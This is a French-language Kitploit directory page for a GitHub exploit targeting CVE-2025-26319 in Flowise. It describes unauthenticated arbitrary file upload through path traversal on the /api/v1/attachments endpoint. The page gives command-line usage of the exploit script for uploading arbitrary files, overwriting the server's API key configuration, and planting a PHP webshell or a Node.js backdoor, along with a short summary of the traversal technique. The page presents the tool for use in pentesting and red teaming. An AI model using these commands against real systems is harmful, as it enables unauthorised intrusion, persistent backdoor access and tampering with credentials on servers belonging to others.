Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-26319 — Exploit for CVE-2025-26319 ciblant le point de terminaison /api/v1/attachments de Flowise, permettant le téléchargement de fichier arbitraire non authentifié et la génération de webshell via path traversal. | Kitploit
Outils/GitHubGitHub/redpack-kr/cve-2025-26319
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubredpack-kr/cve-2025-26319

CVE-2025-26319

Exploit for CVE-2025-26319 ciblant le point de terminaison /api/v1/attachments de Flowise, permettant le téléchargement de fichier arbitraire non authentifié et la génération de webshell via path traversal.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-26319

  1. Téléchargement de fichier de base python flowise_exploit.py -u http://target:3000 -f local_file.txt -d /path/on/server/file.txt
  2. Téléchargement d'un fichier de configuration

Modifier la configuration de la clé API

python flowise_exploit.py -u http://target:3000 -f new_api.json -d /root/.flowise/api.json 3. Génération et téléchargement automatiques d'une webshell

Télécharger une webshell PHP

python flowise_exploit.py -u http://target:3000 --generate-webshell php --webshell-path /var/www/html/shell.php

Télécharger une porte dérobée Node.js

python flowise_exploit.py -u http://target:3000 --generate-webshell nodejs --webshell-path /tmp/backdoor.js

Principe d'attaque Utiliser la route /api/v1/attachments qui est dans la liste blanche, sans nécessiter d'authentification Manipuler le paramètre chatId pour effectuer un path traversal (../../../) Télécharger un fichier arbitraire à n'importe quel endroit du système de fichiers du serveur

Télécharger l’outil